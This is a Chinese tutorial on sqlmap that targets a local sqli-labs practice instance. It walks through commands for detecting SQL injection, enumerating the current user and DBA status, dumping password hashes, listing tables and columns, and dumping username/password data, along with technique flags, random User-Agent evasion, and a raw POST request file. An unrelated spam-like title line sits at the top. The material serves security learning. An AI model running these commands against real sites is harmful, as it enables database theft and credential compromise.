关于建设门户网站的请示seo检查工具
本文用的是kali自带的sqlmap工具
我们通过常用命令来理解sqlmap的基本使用
目录
检测注入
获取敏感信息
获取表
获取表的字段
获取数据
--technique 使用指定的注入方式
使用基于时间的延时注入
支持多种注入检测 默认是全部
注入时使用随机的 HTTP User-Agent
设置超时时间
读取文本进行SQL注入检测
检测注入
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" -dbms mysql -v 1 -batch
-u 检测的url
"" 双引号 表示这是一段字符串
-dbms 指定攻击的数据引擎
-batch 会自动进行默认操作,不用进行交互信息 确定
-v 输出信息登记为1 输出信息详细程度级别:0-6(默认为 1)
0:只显示Python回源(tracebacks),错误(error)和关键(criticle)信息。
1:同时显示信息(info)和警告信息(warning)(默认为1)
2: 同时显示调试信息(debug)
3:同时显示注入的有效载荷(payloads)
4:同时显示http请求
5:同时显示http响应头
6:同时显示http响应内容
级别越高,信息就越详细,根据需求选择合适的输出信息。
获取敏感信息
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 -batch
--current-user 用户连接的用户
--currnet-db 当前库
--is-dba 是否root权限
--passwords 获取数据库的密码 使用这个命令 sqlmap找到密文时,会提示你是否进行hash破解 如果需要选择合适的字典。
获取表
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables
在获取当前库、可以根据库列出表。
-D 指定库
--tables 列出所有表
获取表的字段
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users --columns
获取某个表的所有字段
-T 指定某个表
--columns 获取字段
获取数据
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users -C "username,password" --dump
--dump 是导出数据所有内容
-C "username,password" 获取字段的内容
--technique 使用指定的注入方式
--technique 参数的值的解释
B:Boolean-basedblindSQLinjection(布尔型注入)
E:Error-basedSQLinjection(报错型注入)
U:UNIONquerySQLinjection(可联合查询注入)
S:StackedqueriesSQLinjection(可多语句查询注入)
T:Time-basedblindSQLinjection(基于时间延迟注入)
Q:InlineSQLInjection(内联注入)
使用基于时间的延时注入
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --technique=T
支持多种注入检测 默认是全部
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --technique=BEUT
注入时使用随机的 HTTP User-Agent
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --random-agent
设置超时时间
--time-out 这个参数是设置超时时间 有得网页响应比较慢,可以使用这个参数来增大访问超时的时间。默认是30
sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --timeout=10
读取文本进行SQL注入检测
sqlmap -r post.txt --batch
POST /sqllabs/Less-11/ HTTP/1.1
Host: 192.168.164.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://192.168.164.1
Connection: close
Referer: http://192.168.164.1/sqllabs/Less-11/
Upgrade-Insecure-Requests: 1uname=1&passwd=1&submit=Submit